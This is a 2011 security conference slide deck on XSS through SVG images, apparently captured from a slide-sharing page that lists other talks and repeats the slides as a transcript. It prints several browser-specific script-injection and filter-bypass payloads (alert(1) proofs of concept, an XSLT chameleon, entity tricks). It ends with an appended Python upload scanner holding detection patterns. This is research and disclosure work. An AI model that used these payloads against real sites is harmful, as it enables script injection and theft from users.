The Image that called me
Active Content Injection with SVG Files

A presentation by Mario Heiderich, 2011
Introduction
●   Mario Heiderich
    ●   Researcher and PhD student at the Ruhr-
        University, Bochum
    ●   Security Researcher for Microsoft, Redmond
    ●   Security Consultant for XING AG, Hamburg
    ●   Published author and international speaker
    ●   HTML5 Security Cheatsheet / H5SC
    ●   PHPIDS Project
Today
●   SVGs and the modern web
    ●   What are SVGs?
    ●   What are they capable of?
    ●   Which browsers “understand” SVG?
    ●   Why are there conflicted areas?

●   And what does that have to do with
    security?
SVG Images
●   Scalable Vector Graphics
●   XML based, therefore
    ●   Versatile
    ●   Accessible
    ●   Compressible
    ●   “Stylable” w. CSS
    ●   Open
●   Great for mobile devices
●   Easy to parse and process
●   Ancient format, older than 10 years
●   Relations to HTML5, the living standard
SVG History
●   Proposed by several W3C members in 1998
●   Derived from Adobe Postscript and VML
●   Developed in 1999
●   Currently at version 1.1
    ●   Version 1.2 still a working draft
    ●   Might be overtaken by SVG 2.0
●   Good browser support
    ●   Gecko, Webkit, Presto, and Trident
Basic Example


<svg xmlns="http://www.w3.org/2000/svg">
  <circle r="40" fill="red"></circle>
</svg>
SVG Family
●   SVG Tiny 1.2
    ●   Designed for cellphones and smart-phones
    ●   47 Tags
●   SVG Basic 1.1
    ●   Designed for handhelds, tablets and net-books
    ●   71 tags
●   SVG Full 1.1
    ●   Full feature set
    ●   81 tags
Features
●   Geometrical shapes
    ●   Circles, ellipses, squares, lines and more
    ●   SVG fonts
●   Font specific formatting and glyph styles
●   Links
●   Animations and Transformations
●   Gradients and Effects
●   Meta-data
●   Scripting and Events
●   Inclusion of arbitrary objects
SVG in Action
Scripting
●   The following SVG executes JavaScript

<svg xmlns="http://www.w3.org/2000/svg">
  <script>
    alert(1)
  </script>
</svg>



●   More examples?
More Scripting
<svg xmlns="http://www.w3.org/2000/svg">
   <g onload="javascript:alert(1)"></g>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
   <animation xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg">
   <foreignObject xlink:href="javascript:alert(1)"/>
</svg>

<svg xmlns="http://www.w3.org/2000/svg"> 
   <set attributeName="onmouseover" to="alert(1)"/> 
</svg>

<svg xmlns="http://www.w3.org/2000/svg"> 
   <handler 
       xmlns:ev="http://www.w3.org/2001/xml-events"
       ev:event="load"
   >alert(1)</handler>
</svg>
Deploying SVGs
●   Several ways of deploying SVGs,
    implemented by modern browsers
●   Five important ones are:
    ●   Opening the file directly
    ●   Deployment via <object> or <embed>
    ●   Deployment via <img> or <image>
    ●   Deployment via CSS background/list-
        style/content/cursor
    ●   In-line SVG
Security Boundaries
●   SVG capabilities based on deployment
    method
●   A model, based on expectations
●   Heterogeneous implementations


●   And a whole new world of bugs and
    vulnerabilities
XSS
●   SVGs deployed via <img> and <image> tag should
    not execute JavaScript
●   Same goes for SVGs used via CSS
●   Or SVG fonts


●   SVGs deployed via <iframe>, <embed> or <object>
    should, though
●   So browsers need different approaches


●   Learning by fixing?
Local SVGs
●   SVGs opened directly are allowed to script
●   Imagine the following attack:
    ●   Attacker uploads an image with an exciting motif to a server
    ●   Victim navigates to the image, likes it, saves it locally to the
        downloads folder or desktop
    ●   Victim wants to watch the image again and double-clicks it
    ●   Image is an SVG and executes JavaScript locally
    ●   Attacker can read local files (same directory, sub-folders)
    ●   Attacker can even load and start Java applets or worse
●   Very likely to be used in real life attacks!
●   Porn sites, Email attachments, Malware
In-line SVG
●   Suggested by the HTML5 specs
●   Working on all modern browsers
    ●   Opera 11 recently joined in
●   No strict XML parser anymore
    ●   <svg><circle r=40 fill=red></svg>
    ●   See – no quotes, no trailing slash
●   Reduced feature set
●   <svg> introduces many new XSS vectors
●   XSS filter bypasses
Scoping
●   SVG images are treated by browsers similarly to XML
●   The same goes for in-line SVG blocks
●   XML treats plain-text tags differently
    ●   Entities and canonical character representations are treated equally
    ●   0-Day filter bypasses ahead
●   This enables a new attack technique on Firefox and other browsers


●   DEMO


●   And it's even worse
●   In-line SVG “self-terminates” open HTML elements
Opera
●   A long history of SVG flaws
    ●   JavaScript execution via SVG fonts
    ●   XSS via CSS background images
    ●   SVG containing XHTML renders HTML via <img>


●   Today SVGs deployed via CSS/<img> cannot script
    anymore
●   But - not all kinds of attacks need scripting to succeed


●   DEMO
Firefox
●   SVG/HTML Chameleon
    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xml" href="#stylesheet"?>
    <!DOCTYPE doc [
    <!ATTLIST xsl:stylesheet
       id  ID #REQUIRED>
    ]>
    <svg xmlns="http://www.w3.org/2000/svg">
        <xsl:stylesheet id="stylesheet" version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
           <xsl:template match="/">
               <iframe
                  xmlns="http://www.w3.org/1999/xhtml"
               src="javascript:alert(1)">
               </iframe>
           </xsl:template>
        </xsl:stylesheet>
        <circle fill="red" r="40"></circle>
    </svg>
Opera
●   Using entities to execute JavaScript
●   innerHTML copy/decompile bug
    <a href="#">CLICKME 1</a>

    <svg style=display:none><style>

    &ast;{
    -
    o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1
    &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current
    <span/>


    <a href="#">CLICKME 2</a>
More Opera
●   SVG via favicon
Chromium
●   Incredible parser tolerance
●   1<svg <g onload=alert(1) </p>
Firefox
●   Enabling XSS via entity decoding
●   Entities in <style> tags create new
    elements
●   Even broken ones, half-broken to be
    honest
●   Bug #650001

    <svg>
    <style>&ltimg/src=x onerror=alert(1)//
Other Browsers
●   Firefox 4 crashed badly on SVGs embedding JS
●   Chrome produces weird things when using
    <foreignObject> and <iframe>
●   Opera deploys Java applets via SVG fonts
●   And what about other XML related attack patterns?
    ●   External entities
    ●   SVG Tiny 1.2 Java Events
    ●   Entity bombs
    ●   Etc. etc.
●   Some browsers support SVG Masks, perfect for click-
    jacking
●   SVG and XBL? You tell me!
Wrap-Up
●   SVGs are not just images but mini-applications
●   <img> tags can now deploy Java, PDF and Flash – and call you
    on Skype
●   In-line SVG creates small XML islands enabling XML attacks on
    HTML websites
●   SVG and XSLT work too, enabling DoS and other attacks
●   Web-security and XML security, they meet again!
●   And XXE is back – remember 2002's advisories?


●   SVG is not getting enough attention in the security
    community
●   SVG provides a lot of room for more security research
Defense
●   More difficult than one might assume
    ●   No existing filter libs
    ●   No good documentation
    ●   XSS vectors are hard to comprehend
    ●   New vectors coming up weekly


●   SVG files should not be perceived as images
●   Allowing SVG for upload == allowing HTML for upload
●   SVG can embed, link or reference any kind of content
    over cross domain borders
●   SVG provides new ways of payload obfuscation
Future Work
●   SVG Purifier
    ●   Based on HTMLPurifier 4.3.0
    ●   Still very young
    ●   Smoke-test has been published http://heideri.ch/svgpurifier
●   More articles on the HTML5 Sec Cheatsheet Wiki
●   Publications, to raise awareness
    ●   Crouching Tiger – Hidden Payload, submission CCS 2011
●   More demo vectors on the H5SC to demonstrate impact


●   OWASP research and documentation?
Links
●   Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics
●   W3C SVG Working Group http://www.w3.org/Graphics/SVG/
●   SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/
    ●   SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/
    ●   SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html
●   Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/
●   H5SC http://html5sec.org/
●   XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html
●   Opera SVG Bug http://heideri.ch/opera/
●   HTMLPurifier http://htmlpurifier.org/
●   JSBin http://jsbin.com/
●   SVGPurifier Smoke-Test http://heideri.ch/svgpurifier
●   More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
Thanks
●   Thanks for listening!
●   Questions or Comments?
●   Discussion and tool preview?




●   Thanks to
    ●   Gareth Heyes and Manuel Caballero from UNH
    ●   Alexey Silin / LeverOne
    ●   Erik of Opera
    ●   Dave Ross of Microsoft

Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 

Recently uploaded (20)

Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 

The Image that called me - Active Content Injection with SVG Files

  • 1. The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011
  • 2. Introduction ● Mario Heiderich ● Researcher and PhD student at the Ruhr-University, Bochum ● Security Researcher for Microsoft, Redmond ● Security Consultant for XING AG, Hamburg ● Published author and international speaker ● HTML5 Security Cheatsheet / H5SC ● PHPIDS Project
  • 3. Today ● SVGs and the modern web ● What are SVGs? ● What are they capable of? ● Which browsers “understand” SVG? ● Why there are conflicted areas? ● And what does that have to do with security?
  • 4. SVG Images ● Scalable Vector Graphics ● XML based, therefore ● Versatile ● Accessible ● Compressible ● “Stylable” w. CSS ● Open ● Great for mobile devices ● Easy to parse and process ● Ancient format, older than 10 years ● Relations to HTML5, the living standard
  • 5. SVG History ● Proposed by several W3C members in 1998 ● Derived from Adobe Postscript and VML ● Developed in 1999 ● Currently at version 1.1 ● Version 1.2 still a working draft ● Might be overtaken by SVG 2.0 ● Good browser support ● Gecko, Webkit, Presto, and Trident
  • 6. Basic Example <svg xmlns="http://www.w3.org/2000/svg"> <circle r="40" fill="red"></circle> </svg>
  • 7. SVG Family ● SVG Tiny 1.2 ● Designed for cellphones and smart-phones ● 47 Tags ● SVG Basic 1.1 ● Designed for handhelds, tablets and net-books ● 71 tags ● SVG Full 1.1 ● Full feature set ● 81 tags
  • 8. Features ● Geometrical shapes ● Circles, ellipses, squares, lines and more ● SVG fonts ● Font specific formatting and glyph styles ● Links ● Animations and Transformations ● Gradients and Effects ● Meta-data ● Scripting and Events ● Inclusion of arbitrary objects
  • 10. Scripting ● The following SVG executes JavaScript <svg xmlns="http://www.w3.org/2000/svg"> <script> alert(1) </script> </svg> ● More examples?
  • 11. More Scripting <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(1)"></g> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <animation xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <foreignObject xlink:href="javascript:alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="alert(1)"/> </svg> <svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" >alert(1)</handler> </svg>
  • 12. Deploying SVGs ● Several ways of deploying SVGs, implemented by modern browsers ● Five important ones are: ● Opening the file directly ● Deployment via <object> or <embed> ● Deployment via <img> or <image> ● Deployment via CSS background/list-style/content/cursor ● In-line SVG
  • 13. Security Boundaries ● SVG capabilities based on deployment method ● A model, based on expectations ● Heterogeneous implementations ● And a whole new world of bugs and vulnerabilities
  • 14. XSS ● SVGs deployed via <img> and <image> tag should not execute JavaScript ● Same goes for SVGs used via CSS ● Or SVG fonts ● SVGs deployed via <iframe>, <embed> or <object> should, though ● So browsers need different approaches ● Learning by fixing?
  • 15. Local SVGs ● SVGs opened directly are allowed to script ● Imagine the following attack: ● Attacker uploads an image with an exciting motive to a server ● Victim navigates to the image, likes it, saves it locally, downloads folder or desktop ● Victim wants to watch the image again and double-clicks it ● Image is an SVG and executes JavaScript locally ● Attacker can read local files (same directory, sub-folders) ● Attacker can even load and start Java applets or worse ● Very likely to be used in real life attacks! ● Porn sites, Email attachments, Malware
  • 16. In-line SVG ● Suggested by the HTML5 specs ● Working on all modern browsers ● Opera 11 recently joined in ● No strict XML parser anymore ● <svg><circle r=40 fill=red></svg> ● See – no quotes, no trailing slash ● Reduced feature set ● <svg> introduces many new XSS vectors ● XSS filter bypasses
  • 17. Scoping ● SVG images are treated by browsers similarly to XML ● Same is for in-line SVG blocks ● XML treats plain-text tags differently ● Entities and canonical character representations are treated equally ● 0-Day filter bypasses ahead ● This enables a new attack technique on Firefox and other browsers ● DEMO ● And it's even worse ● In-line SVG “self-terminates” open HTML elements
  • 18. Opera ● A long history of SVG flaws ● JavaScript execution via SVG fonts ● XSS via CSS background images ● SVG containing XHTML renders HTML via <img> ● Today SVGs deployed via CSS/<img> cannot script anymore ● But - not all kinds of attacks need scripting to succeed ● DEMO
  • 19. Firefox ● SVG/HTML Chameleon <?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(1)"> </iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>
  • 20. Opera ● Using entities to execute JavaScript ● innerHTML copy/decompile bug <a href="#">CLICKME 1</a> <svg style=display:none><style> &ast;{ - o&#45fabbalink&colon;&apos;javascript&colon;alert&lpar;1 &rpar;&apos;&semi; -o&#45fabbalink-source&colon;current <span/> <a href="#">CLICKME 2</a>
  • 21. More Opera ● SVG via favicon
  • 22. Chromium ● Incredible parser tolerance ● 1<svg <g onload=alert(1) </p>
  • 23. Firefox ● Enabling XSS via entity decoding ● Entities in <style> tags create new elements ● Even broken ones, half-broken to be honest ● Bug #650001 <svg> <style>&ltimg/src=x onerror=alert(1)//
  • 24. Other Browsers ● Firefox 4 crashed badly on SVGs embedding JS ● Chrome produces weird things when using <foreignObject> and <iframe> ● Opera deploys Java applets via SVG fonts ● And what about other XML related attack patterns? ● External entities ● SVG Tiny 1.2 Java Events ● Entity bombs ● Etc. etc. ● Some browsers support SVG Masks, perfect for click-jacking ● SVG and XBL? You tell me!
  • 25. Wrap-Up ● SVGs are not just images but mini-applications ● <img> tags can now deploy Java, PDF and Flash – and call you on Skype ● In-line SVG creates small XML islands enabling XML attacks on HTML websites ● SVG and XSLT work too, enabling DoS and other attacks ● Web-security and XML security, they meet again! ● And XXE is back – remember 2002's advisories? ● SVG is not getting enough attention in the security community ● SVG provides a lot of room for more security research
  • 26. Defense ● More difficult than one might assume ● No existing filter libs ● No good documentation ● XSS vectors are hard to comprehend ● New vectors coming up weekly ● SVG files should not be perceived as images ● Allowing SVG for upload == allowing HTML for upload ● SVG can embed, link or reference any kind of content over cross domain borders ● SVG provides new ways of payload obfuscation
  • 27. Future Work ● SVG Purifier ● Based on HTMLPurifier 4.3.0 ● Still very young ● Smoke-test has been published http://heideri.ch/svgpurifier ● More articles on the HTML5 Sec Cheatsheet Wiki ● Publications, to raise awareness ● Crouching Tiger – Hidden Payload, submission CCS 2011 ● More demo vectors on the H5SC to demonstrate impact ● OWASP research and documentation?
  • 28. Links ● Wikipedia on SVG http://en.wikipedia.org/wiki/Scalable_Vector_Graphics ● W3C SVG Working Group http://www.w3.org/Graphics/SVG/ ● SVG Full 1.1 (W3C) http://www.w3.org/TR/SVG11/ ● SVG Basic 1.1 and SVG Tiny 1.2 http://www.w3.org/TR/SVGMobile/ ● SVG 2.0 http://dev.w3.org/SVG/profiles/2.0/publish/intro.html ● Adobe's SVG Zone (for archaeologists) http://www.adobe.com/svg/ ● H5SC http://html5sec.org/ ● XSLT and SVG http://scarybeastsecurity.blogspot.com/20...riousity.html ● Opera SVG Bug http://heideri.ch/opera/ ● HTMLPurifier http://htmlpurifier.org/ ● JSBin http://jsbin.com/ ● SVGPurifier Smoke-Test http://heideri.ch/svgpurifier ● More SVG fun http://maliciousmarkup.blogspot.com/20...re-xml-fun.html
  • 29. Thanks ● Thanks for listening! ● Questions or Comments? ● Discussion and tool preview? ● Thanks to ● Gareth Heyes and Manuel Caballero from UNH ● Alexey Silin / LeverOne ● Erik of Opera ● Dave Ross of Microsoft
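
The Defense slide's point that allowing SVG upload equals allowing HTML upload can be turned into an upload gate. The following is an added example, not code from the presentation or from SVG Purifier: a conservative Python check that refuses SVG files showing the active-content patterns from slides 11, 19 and 24. The function name, the tag list and the samples are assumptions constructed for illustration, and the check does not cover every vector the slides mention (CSS and entity tricks inside `<style>`, for instance).

```python
import xml.parsers.expat

SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_TAGS = {"script", "handler", "foreignObject", "animation"}  # from slide 11

class _DoctypeSeen(Exception):
    """Raised to stop parsing before any entity declaration is processed."""

def scan_svg(data: bytes) -> list:
    """Return reasons to refuse an uploaded SVG (empty list: none found)."""
    findings = []
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")

    def on_doctype(*_args):
        findings.append("DOCTYPE declaration")
        raise _DoctypeSeen

    def on_pi(target, _data):
        findings.append(f"processing instruction <?{target}?>")

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")
        if ns != SVG_NS:
            findings.append(f"non-SVG element <{local}>")
        elif local in ACTIVE_TAGS:
            findings.append(f"active element <{local}>")
        for key, value in attrs.items():
            attr = key.rpartition(" ")[2]
            compact = "".join(value.split()).lower()  # drop embedded whitespace
            if attr.lower().startswith("on"):
                findings.append(f"event attribute {attr}")
            elif attr == "href" and compact.startswith("javascript:"):
                findings.append("javascript: URI in href")
            elif attr == "attributeName" and compact.startswith("on"):
                findings.append(f"animation targets event attribute {value}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ProcessingInstructionHandler = on_pi
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except _DoctypeSeen:
        pass
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"not well-formed XML: {exc}")
    return findings

# Constructed samples modelled on the slides' own vectors.
SAMPLES = {
    "circle": b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="40" fill="red"/></svg>',
    "script": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    "onload": b'<svg xmlns="http://www.w3.org/2000/svg"><g onload="alert(1)"/></svg>',
    "set": b'<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/></svg>',
    "doctype": b'<!DOCTYPE doc [<!ENTITY a "b">]><svg xmlns="http://www.w3.org/2000/svg"/>',
    "xhtml": b'<svg xmlns="http://www.w3.org/2000/svg"><iframe xmlns="http://www.w3.org/1999/xhtml"/></svg>',
}
```

A file with any finding is best refused or served as a download from a separate origin rather than repaired in place; the check only reports what it recognises.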